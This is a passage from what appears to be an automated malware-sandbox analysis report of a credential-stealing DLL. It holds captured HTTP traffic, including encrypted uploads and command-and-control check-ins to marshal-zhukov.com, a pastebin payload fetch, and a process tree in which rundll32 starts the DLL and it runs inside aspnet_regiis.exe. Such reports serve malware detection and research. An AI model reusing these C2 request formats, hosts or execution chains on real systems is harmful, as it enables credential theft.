                                                                                                                                                                                                            Data Ascii: gk&<5`c=14E@?$t3x{PaA>Z-X5QU[Uc^CYyrM\g=]'`k{h OZdWD+.HMqW=?8>ueP'{]rz~ZO`8A=r$"?,1-Ace10OKS?>{w[ 7s
                                                                                                                                                                                                            2024-11-14 11:19:50 UTC15331OUTData Raw: 70 85 70 fc a5 4a 3f d7 f7 62 76 8e e1 58 c6 2c 3f 3f 8c 9a a8 aa 91 f9 fe 25 c4 8b 41 32 11 f4 86 9a 3c df f8 f4 b1 17 e5 14 64 48 af 40 76 1e 11 75 1f 44 87 89 a7 b5 ee 28 ef bd f6 59 7d 4f f2 b0 95 0b d3 45 74 9e ca fe 5b 31 51 3c ec a6 72 41 a0 c0 e9 5f 68 a4 05 7d 23 c1 70 ae 71 80 52 22 7a f2 94 6d ba a9 d9 c9 18 f7 99 dc 00 a2 20 24 68 0b f4 81 49 6c 81 60 f0 5d 35 6a 86 54 b8 1f f6 72 d7 00 05 47 54 0e bb 8c d2 5c 05 08 e1 a1 38 17 7b b5 fb 1e 62 27 fe 83 f7 bf ab 97 be a4 73 7c ec 17 1c 29 d6 df 09 bb e9 48 d9 c9 7b 1e c5 bc 41 ef 36 b9 d9 fe c5 e3 6d c4 8f 87 a2 86 b7 5b 6d c7 d3 b4 e1 eb a3 58 6b 5c 62 82 97 19 91 40 25 96 f1 f1 c2 cd 84 b9 96 6b c9 6c e4 0c 06 14 0b d8 65 d6 0a 64 91 10 4b 3e 4d 69 11 35 d6 bc bc 29 10 ed f8 e1 95 04 e8 3c 2c
                                                                                                                                                                                                            Data Ascii: ppJ?bvX,??%A2<dH@vuD(Y}OEt[1Q<rA_h}#pqR"zm $hIl`]5jTrGT\8{b's|)H{A6m[mXk\b@%kledK>Mi5)<,
                                                                                                                                                                                                            2024-11-14 11:19:50 UTC15331OUTData Raw: 8d ec 60 cb e0 95 ed 63 ab ad ad 27 8e 19 95 d8 1c 5c 73 5e 78 6c c2 61 2c d6 ed 96 5c 7d 94 51 da d4 74 8d c3 de c9 6b ae dc e1 25 0c dd 00 a4 49 19 75 01 18 f7 50 09 f0 63 5e 30 6a 0e ab d4 03 3d 8b b6 fe 84 70 d3 ce bb a7 0a c9 f7 02 de c9 3b 7f ab 40 1e d7 c1 4d b4 12 69 02 b2 71 c4 82 13 df 35 44 1f 36 fe f1 44 83 40 1e a1 e3 0a ce 6c f4 99 52 d5 c4 c0 0d 06 15 c5 2c 3e a4 7f 1b 03 82 d1 10 08 c1 6e eb 8f 7c d7 82 b7 63 90 c3 58 40 ca 52 4a 3c 0f 0a 24 04 f8 01 61 9d c8 0b e2 53 99 2b 45 30 ea 87 6c 01 38 cd 7a 4f 07 46 14 12 f2 6d a3 6a c3 3d dc c0 1d c1 74 2e 89 87 f5 2c ba c1 f0 51 ee fa 7b b9 08 9c 7b 99 2d 8a 7d 78 e1 c2 0b d2 eb f8 8a 1c 01 70 90 31 f6 24 70 7a b2 ea 0f 89 02 95 9d ef 70 1c 0a f2 83 fd d8 8c 29 1e cc d0 89 f6 6f 0c e3 dd 9d 45
                                                                                                                                                                                                            Data Ascii: `c'\s^xla,\}Qtk%IuPc^0j=p;@Miq5D6D@lR,>n|cX@RJ<$aS+E0l8zOFmj=t.,Q{{-}xp1$pzp)oE
                                                                                                                                                                                                            2024-11-14 11:19:50 UTC15331OUTData Raw: 6c c5 39 be 1e 90 7e 17 4a 8b 3f 37 76 14 27 6f 98 b3 38 a5 9f f2 51 ad ac b3 4e 0a 0d 9b 52 73 b6 b8 a7 05 36 10 06 5e 24 92 b9 f1 c1 1a 8f 29 4f e9 80 f4 8d 49 33 eb 1f 68 64 77 7f 15 26 9d a0 e5 fc 8f dd 13 e6 17 1c 81 c9 11 18 c7 56 a6 57 7a 36 78 8b 2c 8b 8b 84 75 ed 2f 7e fc 00 03 07 aa e0 97 91 13 6f 66 ca 66 3f 32 b6 11 41 da f5 13 8c f4 de a8 23 49 f2 ec dc 96 ad 26 45 cf 22 ac 34 b3 3c 7c 57 66 f6 35 ba 1f 45 a3 26 f6 7b 8c 1e 32 6a 8d 7f e3 58 84 db 7b 37 75 aa ae e5 af fa e2 ab 6e c5 6d 11 fc 3c 4f 3f 56 19 86 21 fb f8 83 e6 9e c9 19 cc 46 ad c7 9f 60 86 37 79 a6 76 20 b0 20 64 b8 22 77 c4 75 2d 7f e4 d6 50 17 af 24 36 64 e9 9b 45 99 b9 57 ba 4f c4 94 a9 c9 ef 2e db d6 ab 9d db db ae 35 6c 6f 8b 6b 9f 5e cc 91 61 f9 ac 7a 23 46 3f 04 7a 14 9f
                                                                                                                                                                                                            Data Ascii: l9~J?7v'o8QNRs6^$)OI3hdw&VWz6x,u/~off?2A#I&E"4<|Wf5E&{2jX{7unm<O?V!F`7yv d"wu-P$6dEWO.5lok^az#F?z
                                                                                                                                                                                                            2024-11-14 11:19:50 UTC15331OUTData Raw: 95 2f cc be 92 07 5f 6b 63 87 8e ba c1 8f 24 01 22 c3 29 bf cd 7c 68 ff 34 ce fe da c8 db 71 ed 01 ee fc 5b 12 da a0 be f7 2b c4 3a 80 ac 7f 20 12 2d 34 a3 c1 48 66 83 84 30 29 12 01 5c 74 64 bc e4 f1 c8 9a cb 7d 3b df b5 07 91 c0 fe f1 af 32 ae 2e f3 d7 fe 5e 0d 98 f9 c8 d8 36 1b cf dc 6d a4 78 2f 9d ae 69 66 1e 65 cf 1c 36 35 c2 c8 11 da 05 0b 97 b2 05 de ab 27 26 c4 0d 9a 6d e2 d7 71 7a ce 51 b2 54 77 0b 33 f0 a8 87 fb 77 94 77 9c 29 ac b8 71 a6 26 f4 8e 70 71 18 36 08 f5 33 c7 21 47 5e 5d fe 78 d0 70 e0 8f 27 eb 8b 5f 7d 54 fd f0 cf 9a cd 48 ab 56 09 9b 43 4d 63 6d 1b de 11 fa 18 9a 9b ae 5d b0 dc 70 e0 de 59 91 88 95 4f b2 9b a7 9f ed 3c 2d f4 c7 72 25 50 95 25 bb e7 5c 40 0d a5 48 76 20 dd 1e ef 8c 5e b1 64 db d8 06 df e2 84 fc b8 91 24 a9 2f 2e a8
                                                                                                                                                                                                            Data Ascii: /_kc$")|h4q[+: -4Hf0)\td};2.^6mx/ife65'&mqzQTw3ww)q&pq63!G^]xp'_}THVCMcm]pYO<-r%P%\@Hv ^d$/.
                                                                                                                                                                                                            2024-11-14 11:19:53 UTC1022INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:52 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=kem08fr3jptlij8v6bvoa80131; expires=Mon, 10-Mar-2025 05:06:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IlqYGGS0EdYr9OPmHHmP1l1soQj7ZlM0L5Rkak%2FxzDiNpkyPfA2w1LxEhI0u1WbO3X94oo8ys25wx918E6vLtoRm1%2BbmwQDDHuDvGFl2Qdzuq8Hq0YK324S%2FLi9ynA514VM%2Bx0w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269bda9a50469b-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1193&sent=218&recv=601&lost=0&retrans=0&sent_bytes=2847&recv_bytes=557712&delivery_rate=1276333&cwnd=32&unsent_bytes=0&cid=782ee3ed1bc36fbe&ts=2912&x=0"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            17192.168.2.1049934188.114.97.34437232C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:51 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 85
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:51 UTC85OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 6e 6d 72 7a 76 38 38 26 6a 3d 26 68 77 69 64 3d 34 37 35 31 30 46 44 33 35 30 33 42 36 35 35 35 34 31 35 38 31 31 46 43 41 32 36 32 30 32 46 46
                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@nmrzv88&j=&hwid=47510FD3503B6555415811FCA26202FF
                                                                                                                                                                                                            2024-11-14 11:19:56 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:55 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=b7kurjep5r386h73set4bg0q0u; expires=Mon, 10-Mar-2025 05:06:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l9j48xzywjvQi66HnZ09LQ64aZecVSHajMWdAyW4UqfNt4Q1dLRbtFrCO9zckZdX%2FgFhBpZbfdgoZPIzSnk6Z4k5PvmmsE%2FFn4U3qLbsJ90pv74rC%2FTs%2FvNy2vPtrgu8ZZle8qQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269be6083b6b33-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1879&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=987&delivery_rate=1242918&cwnd=251&unsent_bytes=0&cid=803e0560c1b91495&ts=3219&x=0"
                                                                                                                                                                                                            2024-11-14 11:19:56 UTC126INData Raw: 37 38 0d 0a 59 73 4d 77 59 34 6c 70 63 75 2b 64 56 34 45 56 47 5a 4b 6e 4d 70 42 2b 66 71 52 41 6f 4e 30 48 5a 6f 51 77 6e 45 55 4c 57 34 51 35 75 42 49 57 71 31 4e 51 68 2b 6b 6a 38 53 39 46 76 66 73 64 6f 55 70 4a 69 6e 53 56 38 7a 4e 52 71 67 69 74 47 53 51 34 36 77 79 72 58 78 44 39 52 78 65 58 2b 48 57 74 4e 33 2f 6d 68 51 69 67 55 6c 7a 42 59 70 72 74 65 6a 73 3d 0d 0a
                                                                                                                                                                                                            Data Ascii: 78YsMwY4lpcu+dV4EVGZKnMpB+fqRAoN0HZoQwnEULW4Q5uBIWq1NQh+kj8S9FvfsdoUpJinSV8zNRqgitGSQ46wyrXxD9RxeX+HWtN3/mhQigUlzBYprtejs=
                                                                                                                                                                                                            2024-11-14 11:19:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            18192.168.2.1049945188.114.97.34437188C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:53 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 85
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:53 UTC85OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 6e 6d 72 7a 76 38 38 26 6a 3d 26 68 77 69 64 3d 34 37 35 31 30 46 44 33 35 30 33 42 36 35 35 35 34 31 35 38 31 31 46 43 41 32 36 32 30 32 46 46
                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@nmrzv88&j=&hwid=47510FD3503B6555415811FCA26202FF
                                                                                                                                                                                                            2024-11-14 11:19:56 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:55 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=ctkvgc80bnjfkc92qncglcoonb; expires=Mon, 10-Mar-2025 05:06:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q97%2BY7oQiIBAagel7PSCrrMysgsmQk3dMp1lgngZS3e0fP%2BBnog6XzJxGPKuDgxhYWiUhVv7uAh7vpk5dbArboi64M9aR3EaLgeyYaReJUD8JyD%2FGUP72j440wva%2FvHkbnEza0o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269bf10df7466e-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1233&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=987&delivery_rate=2431570&cwnd=243&unsent_bytes=0&cid=dbf066c2111fe8dd&ts=1616&x=0"
                                                                                                                                                                                                            2024-11-14 11:19:56 UTC126INData Raw: 37 38 0d 0a 45 71 47 43 41 6d 72 6a 53 44 6a 76 65 41 4f 42 39 71 65 48 33 39 57 69 57 42 75 68 59 65 6c 30 32 76 63 62 55 43 6f 64 74 36 31 4a 32 71 42 33 53 4e 6c 71 55 4a 73 4d 63 37 75 71 69 4e 76 77 35 4a 5a 76 4e 5a 56 55 78 30 44 74 32 53 4e 68 64 6a 4c 55 77 6e 7a 4a 37 58 45 65 7a 53 31 41 69 6c 6f 76 6f 35 44 54 70 65 58 6c 6a 6e 70 2b 67 31 76 5a 43 59 63 3d 0d 0a
                                                                                                                                                                                                            Data Ascii: 78EqGCAmrjSDjveAOB9qeH39WiWBuhYel02vcbUCodt61J2qB3SNlqUJsMc7uqiNvw5JZvNZVUx0Dt2SNhdjLUwnzJ7XEezS1Ailovo5DTpeXljnp+g1vZCYc=
                                                                                                                                                                                                            2024-11-14 11:19:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            19192.168.2.1049994172.67.19.244436704C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:20:16 UTC74OUTGET /raw/dq3hWX27 HTTP/1.1
                                                                                                                                                                                                            Host: pastebin.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-14 11:20:16 UTC229INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:20:16 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269c7e1b492cbf-DFW
                                                                                                                                                                                                            2024-11-14 11:20:16 UTC1140INData Raw: 31 31 35 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                                                            Data Ascii: 115d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                                                            2024-11-14 11:20:16 UTC1369INData Raw: 72 69 70 74 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d
                                                                                                                                                                                                            Data Ascii: ript>...<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-
                                                                                                                                                                                                            2024-11-14 11:20:16 UTC1369INData Raw: 4e 6d 66 53 63 66 54 66 77 59 2d 31 37 33 31 35 38 33 32 31 36 2d 30 2e 30 2e 31 2e 31 2d 2f 72 61 77 2f 64 71 33 68 57 58 32 37 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20
                                                                                                                                                                                                            Data Ascii: NmfScfTfwY-1731583216-0.0.1.1-/raw/dq3hWX27"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form>
                                                                                                                                                                                                            2024-11-14 11:20:16 UTC575INData Raw: 3e 0a 20 20 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 76 61 72 20 62 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22
                                                                                                                                                                                                            Data Ascii: > <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("
                                                                                                                                                                                                            2024-11-14 11:20:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:06:19:24
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:loaddll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll"
                                                                                                                                                                                                            Imagebase:0x470000
                                                                                                                                                                                                            File size:126'464 bytes
                                                                                                                                                                                                            MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                            Start time:06:19:24
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff620390000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                            Start time:06:19:25
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll",#1
                                                                                                                                                                                                            Imagebase:0xd70000
                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                            Start time:06:19:25
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:rundll32.exe C:\Users\user\Desktop\n7ZKbApaa3.dll,WindowsHandle
                                                                                                                                                                                                            Imagebase:0x6a0000
                                                                                                                                                                                                            File size:61'440 bytes
                                                                                                                                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                            Start time:06:19:25
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll",#1
                                                                                                                                                                                                            Imagebase:0x6a0000
                                                                                                                                                                                                            File size:61'440 bytes
                                                                                                                                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                            Start time:06:19:25
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                                                                                            Imagebase:0x40000
                                                                                                                                                                                                            File size:43'016 bytes
                                                                                                                                                                                                            MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                            Start time:06:19:25
                                                                                                                                                                                                            Start date:14/11/2024
                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                                                                                            Imagebase:0x40000
                                                                                                                                                                                                            File size:43'016 bytes
                                                                                                                                                                                                            MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1652122961.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
